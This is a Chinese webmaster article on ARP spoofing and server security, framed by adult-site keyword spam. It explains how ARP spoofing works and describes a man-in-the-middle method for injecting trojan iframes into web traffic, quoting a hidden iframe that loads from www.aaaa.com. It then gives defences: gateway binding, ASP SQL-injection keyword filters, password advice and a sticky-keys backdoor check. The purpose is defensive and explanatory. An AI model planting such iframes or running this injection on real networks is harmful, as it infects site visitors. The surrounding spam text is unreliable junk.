亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb

首頁 > 網站 > 建站經驗 > 正文

ARP地址欺騙的解決方法

2024-04-25 20:17:24
字體:
來源:轉載
供稿:網友

   什么是arp

   地址解析協議(address resolution protocol,arp)是在僅知道主機的ip地址時確定其物理地址的一種協議。因ipv4和以太網的廣泛應用,其主要用作將ip地址翻譯為以太網的mac地址,但其也能在atm和fddiip網絡中使用。從ip地址到物理地址的映射有兩種方式:表格方式和非表格方式。arp具體說來就是將網絡層(ip層,也就是相當于osi的第三層)地址解析為數據連接層(mac層,也就是相當于osi的第二層)的mac地址。

   假設:
   計算機a的ip為192.168.1.1,mac地址為00-11-22-33-44-01;
   計算機b的ip為192.168.1.2,mac地址為00-11-22-33-44-02;

   arp工作原理如下:

   在tcp/ip協議中,a給b發送ip包,在包頭中需要填寫b的ip為目標地址,但這個ip包在以太網上傳輸的時候,還需要進行一次以太包的封裝,在這個以太包中,目標地址就是b的mac地址.

   計算機a是如何得知b的mac地址的呢?解決問題的關鍵就在于arp協議。

   在a不知道b的mac地址的情況下,a就廣播一個arp請求包,請求包中填有b的ip(192.168.1.2),以太網中的所有計算機都會接收這個請求,而正常的情況下只有b會給出arp應答包,包中就填充上了b的mac地址,并回復給a。

   a得到arp應答后,將b的mac地址放入本機緩存,便于下次使用。

   本機mac緩存是有生存期的,生存期結束后,將再次重復上面的過程。

   arp協議并不只在發送了arp請求才接收arp應答。當計算機接收到arp應答數據包的時候,就會對本地的arp緩存進行更新,將應答中的ip和mac地址存儲在arp緩存中。因此,當局域網中的某臺機器b向a發送一個自己偽造的arp應答,而如果這個應答是b冒充c偽造來的,即ip地址為c的ip,而mac地址是偽造的,則當a接收到b偽造的arp應答后,就會更新本地的arp緩存,這樣在a看來c的ip地址沒有變,而它的mac地址已經不是原來那個了。由于局域網的網絡流通不是根據ip地址進行,而是按照mac地址進行傳輸。所以,那個偽造出來的mac地址在a上被改變成一個不存在的mac地址,這樣就會造成網絡不通,導致a不能ping通c!這就是一個簡單的arp欺騙。

   應用

   在網絡執法官中,要想限制某臺機器上網,只要點擊"網卡"菜單中的"權限",選擇指定的網卡號或在用戶列表中點擊該網卡所在行,從右鍵菜單中選擇"權限",在彈出的對話框中即可限制該用戶的權限。對于未登記網卡,可以這樣限定其上線:只要設定好所有已知用戶(登記)后,將網卡的默認權限改為禁止上線即可阻止所有未知的網卡上線。使用這兩個功能就可限制用戶上網。其原理是通過arp欺騙發給被攻擊的電腦一個假的網關ip地址對應的mac,使其找不到網關真正的mac地址,這樣就可以禁止其上網。

   防御
   arp欺騙可以導致目標計算機與網關通信失敗

   更可怕的是會導致通信重定向,所有的數據都會通過攻擊者的機器,因此存在極大的安全隱患。

   基與pc到pc的ip-mac雙向綁定可以解決arp欺騙

   但是對于不支持ip-mac雙向綁定的設備

   就需要用可以綁定端口-mac的交換來預防arp欺騙

   另外,windows 2ksp4 xpsp1 的arp-s綁定是無效的

   需要升級到 2ksp5 或 xpsp2


   網頁掛馬原理

   不管是訪問服務器上的任何網頁,就連404的頁面也會在<html>后加入:

   <iframe src=http://www.aaaa.com/a.htm width =1 height=1 frameborder=0></iframe>;,掛馬的位置在html標記左右,上面這段惡意代碼,它會每隔幾秒加入代碼,也就是說在輸出具體的東西之前就被掛了,有時有有時又沒有,不是網頁源代碼問題,也沒有在網頁源代碼中加入惡意代碼,即使重裝服務器,格式化重分區過第一個硬盤,放上去網站沒多久一樣再會出現這種情況.

   首先就排除了網站被入侵的可能,因為首頁能加在那個位置只能是 title的地方,用js控制也不大可能.然后去看了php.ini的設置也沒有任何的異常,而且這個插入的代碼有的時候出現有的時候不出現,說明不是網站的問題了.打開同服務器的其他網站也有這個情況發生,而且狀況一一樣.檢查并且搜索掛馬的關鍵字之后確定不是網站程序的問題.

   那么剩下的要么是iis自己出了問題,要么是網絡的問題,因為數據是處理沒有問題(這個由程序輸出,而且即使是html都會出問題),經過一個一個排查,最后基本可以確定就是arp欺騙欺騙數據報走向,然后中間人修改一些定義的關鍵字.因為是網絡層次有問題(所以重做系統是沒有用的).

   目的:通過arp欺騙來直接掛馬

   優點:可以直接通過arp欺騙來掛馬.

   通常的arp欺騙的攻擊方式是在同一vlan下,控制一臺主機來監聽密碼,或者結合ssh中間人攻擊來監聽ssh1的密碼
但這樣存在局限性:1.管理員經常不登陸,那么要很久才能監聽到密碼
2.目標主機只開放了80端口,和一個管理端口,且80上只有靜態頁面,那么很難利用.而管理端口,如果是3389終端,或者是ssh2,那么非常難監聽到密碼.

   優點:1.可以不用獲得目標主機的權限就可以直接在上面掛馬
2.非常隱蔽,不改動任何目標主機的頁面或者是配置,在網絡傳輸的過程中間直接插入掛馬的語句.
3.可以最大化的利用arp欺騙,從而只要獲取一臺同一vlan下主機的控制權,就可以最大化戰果.

   原理:arp中間人攻擊,實際上相當于做了一次代理。

   正常時候: a---->b ,a是訪問的正??蛻?b是要攻擊的服務器,c是被我們控制的主機
arp中間人攻擊時候: a---->c---->b         b---->c---->a

   實際上,c在這里做了一次代理的作用

   那么http請求發過來的時候,c判斷下是哪個客戶端發過來的包,轉發給b,然后b返回http響應的時候,在http響應包中,插入一段掛馬的代碼,比如 <iframe>...之類,再將修改過的包返回的正常的客戶a,就起到了一個掛馬的作用.在這個過程中,b是沒有任何感覺的,直接攻擊的是正常的客戶a,如果a是管理員或者是目標單位,就直接掛上馬了.

   防御專題

   最簡單的辦法就一命令ok,實現與網關綁定,比如網關是 192.168.0.1 比如網關mac 00-00-00-00-00,好了我們直接用記事本保存代碼為 arp -s 192.168.0.1 00-00-00-00-00 然后保存,改拓展名為bat 加入到服務器啟動項,目前arp攻擊猖獗,arp的目前為一的完美解決方案就是實現 本機與網關的雙向綁定。所謂arp防火墻,只是起到暫時保護的作用,以上方法可以有效的防止服務器被人arp掛馬

   sql漏洞專題

   簡單一點:

   對于int型的參數,如文章的id等,可以先判斷是不是整數。

id =trim(request("id"))
if id<>"" then
if not isnumeric(id) then
response.write"請提供數字型參數"
response.end
end if
id = clng(id)
else
response.write"請輸入參數id"
response.end
end if

   這樣的話,明小子系列就無法注入了。

   也可以控制 "'"號輸入就行了,再控制一些 sql 關鍵字的這樣更安全

   比如

id=trim(request("id"))

if instr(id,"'")>0 or instr(id,"insert")>0 then
response.write "對不起,請不要注入本站"
response.end
end if

   提醒大家,sql只要打完必補丁,最重要的是,千萬別設置什么sa/123456 sa/123 sa/sa之類的弱口令,現在的小黑太多了,動不動就是全網段掃描1433弱口令,在次提醒大家,千萬別設置弱口令?;痉掌骶桶踩ㄐ『谑沁M不來的,高手嘛,說不準了,反正高手也不會動你的東西)

   服務器安全之后門篇

   我們今天主要講解2003服務器

   最常見的問題,服務器一般都開3389 4899等,在次提醒大家,弱口令問題,現在什么小黑都有,千萬別設置什么123 123456之類,修改3389 4899端口 建議停止微軟的防火墻,直接在網上,開放需要的端口。系統補丁,我想不用說,肯定要打的。也可采用國外的一款軟件 黑冰(號稱世界排第三,本人以前用過,感覺也就那樣,不過確實不錯)

   本地安全策略設置密碼強度,然后刪出系統默認管理員,修改管理組,別留什么adminisrators 呵呵,不允許建立帳戶,嘿嘿,絕吧。
服務器殺毒軟件必備!推薦使用麥咖啡。上次進了一批服務器,發現全是用麥咖啡(連聯眾的計費服務器,baidu的有一個服務器也是),設置ok基本百毒不侵(服務器好的建議使用,呵呵就可以防止什么鴿子啊,黑洞啊,紅娘啊之類的東西裝上了)。
在次說明請大家檢查自己的服務器登陸3389界面,別輸入密碼,先按5次shift,看看,如果彈出c盤,或cmd 或則一個密碼窗口,呵呵恭喜你,你的服務器被人玩了,小弟可幫大家解決,這個后門被譽為windows最強悍后門。不需要密碼驗證,直接得到shell。

發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb
成人激情视频在线| 日韩av免费在线看| 国产99视频在线观看| 国产91精品青草社区| 国产亚洲免费的视频看| 亚洲精品一区av在线播放| 亚洲视频在线免费观看| 亚洲第一福利在线观看| 国产ts人妖一区二区三区| 欧美有码在线视频| 91国产美女在线观看| 成人国产亚洲精品a区天堂华泰| 久久久久久久久中文字幕| 伊人伊成久久人综合网站| 亚洲男人第一网站| 亚洲最大福利视频网站| 久久久人成影片一区二区三区| 亚洲人成网站777色婷婷| 欧美精品在线第一页| 91豆花精品一区| 九九热这里只有精品6| 亚洲人成五月天| 亚洲精品在线看| 欧美成人sm免费视频| 国内精品久久久久伊人av| 乱亲女秽乱长久久久| 欧美一乱一性一交一视频| 国产一区二区精品丝袜| 亚洲人午夜精品免费| 久久亚洲精品小早川怜子66| 欧美精品在线免费播放| 色先锋资源久久综合5566| 亚洲香蕉av在线一区二区三区| 国产成人免费91av在线| 91精品国产色综合| 久久久久久网址| 成人a视频在线观看| 欧美老女人www| 亚洲欧美日韩中文在线制服| 97不卡在线视频| 日韩精品免费观看| 亚洲成年人在线| 国产精品福利久久久| 欧美成人手机在线| 亚洲国产中文字幕久久网| 午夜美女久久久久爽久久| 亚洲福利视频在线| 久久影视电视剧免费网站清宫辞电视| 欧美日韩国产激情| 97人人爽人人喊人人模波多| 久久久久久九九九| 亚洲亚裔videos黑人hd| 日韩精品在线影院| 久久久伊人欧美| 国产精品av电影| 亚洲电影免费观看高清完整版| 黑人巨大精品欧美一区免费视频| 国产精品高清在线观看| 69**夜色精品国产69乱| 68精品久久久久久欧美| 91精品久久久久久综合乱菊| 亚洲免费小视频| 精品久久久国产精品999| 4438全国亚洲精品在线观看视频| 色综合久久悠悠| 日韩欧美aaa| 欧美激情视频三区| 成人国产精品一区| 国产v综合v亚洲欧美久久| 色香阁99久久精品久久久| 国产成人免费av电影| 97在线看免费观看视频在线观看| 亚洲国产黄色片| 亚洲国产精品va在线观看黑人| 成人h视频在线观看播放| 精品免费在线视频| 欧美日韩国产va另类| 国产精品久久久av久久久| 91久久久在线| 精品视频久久久久久久| 亚洲最大在线视频| 成人午夜激情免费视频| 久久久久99精品久久久久| 欧美裸体xxxx极品少妇| 九九热在线精品视频| 成人午夜激情免费视频| 国产精品日韩av| 国产成人精品视频在线| 91在线观看免费网站| 国产精品日韩专区| 欧美日韩一区二区三区在线免费观看| 亚洲综合在线播放| 欧美综合国产精品久久丁香| 欧美性猛交xxxx乱大交极品| 51午夜精品视频| 亚洲影影院av| 日韩在线视频观看| 91久久国产婷婷一区二区| 欧美激情精品久久久久久| 国产婷婷97碰碰久久人人蜜臀| 国产成人精彩在线视频九色| 国产精品久久久久免费a∨大胸| 亚洲在线免费观看| 亚洲最大激情中文字幕| 欧美又大又粗又长| 成人精品网站在线观看| 国产激情综合五月久久| 日韩高清欧美高清| 欧美日韩免费看| 日韩欧美在线中文字幕| 日韩动漫免费观看电视剧高清| 亚洲精品久久久久久下一站| 色综合久久久888| 这里只有精品丝袜| 在线观看91久久久久久| 精品色蜜蜜精品视频在线观看| 亚洲图片欧美午夜| 91亚洲精品久久久久久久久久久久| 亚洲第一精品福利| 狠狠躁夜夜躁久久躁别揉| 国产亚洲免费的视频看| 欧美视频二区36p| 欧美极品少妇全裸体| 国产亚洲综合久久| 日韩欧美第一页| 国产免费一区二区三区在线观看| 亚洲第一页自拍| 欧美午夜视频在线观看| 国产成人avxxxxx在线看| 亚洲一区中文字幕在线观看| 国产做受高潮69| 日韩av中文字幕在线免费观看| 国产精品中文字幕久久久| 久久免费国产视频| 日韩视频免费在线观看| 亚洲美女性视频| 亚洲国产又黄又爽女人高潮的| 国产www精品| 黑人精品xxx一区一二区| 亚洲精品有码在线| 欧美另类极品videosbestfree| 亚洲国产又黄又爽女人高潮的| 亚洲精品狠狠操| 国产一区香蕉久久| 91色视频在线导航| 成人在线视频网站| 国产成人aa精品一区在线播放| 日韩亚洲在线观看| 欧美激情综合亚洲一二区| 国产91成人video| 成人黄色影片在线| 欧美激情免费观看| 国产精品久久一区主播| 日韩欧美成人网| 久久天堂电影网| 久久99久国产精品黄毛片入口| 中文字幕精品www乱入免费视频| 欧美日韩国产一区中文午夜| 91精品91久久久久久| 色偷偷av亚洲男人的天堂| 精品久久久久久久久久久久久久| 亚洲欧美日韩爽爽影院| 91精品国产91久久久久久不卡| 国产精品亚洲综合天堂夜夜|